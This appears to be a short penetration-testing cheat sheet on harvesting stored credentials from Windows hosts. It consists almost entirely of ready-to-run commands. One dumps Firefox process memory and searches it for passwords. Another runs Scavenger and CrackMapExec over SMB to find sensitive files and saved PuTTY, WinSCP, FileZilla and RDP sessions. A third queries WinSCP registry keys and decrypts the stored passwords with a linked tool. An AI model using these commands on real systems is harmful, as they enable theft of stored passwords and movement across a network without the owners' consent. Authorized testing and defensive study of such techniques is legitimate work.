Searching Informations

Tips

# Getting passwords from browser memory
procdump.exe -ma firefox_pid
strings.exe firefox.dmp | findstr /i "Passwd="


Scavenger

# Scavenger is a tool used above CrackMapExec to automate the process
# of looking for sensitive files and informations during Internal Pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite


WinSCP

# WinSCP is potentially exploitable in the registry if not using a master password
# You can manually request the key
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"

# Then let's recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automatisation using CrackMapExec
# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher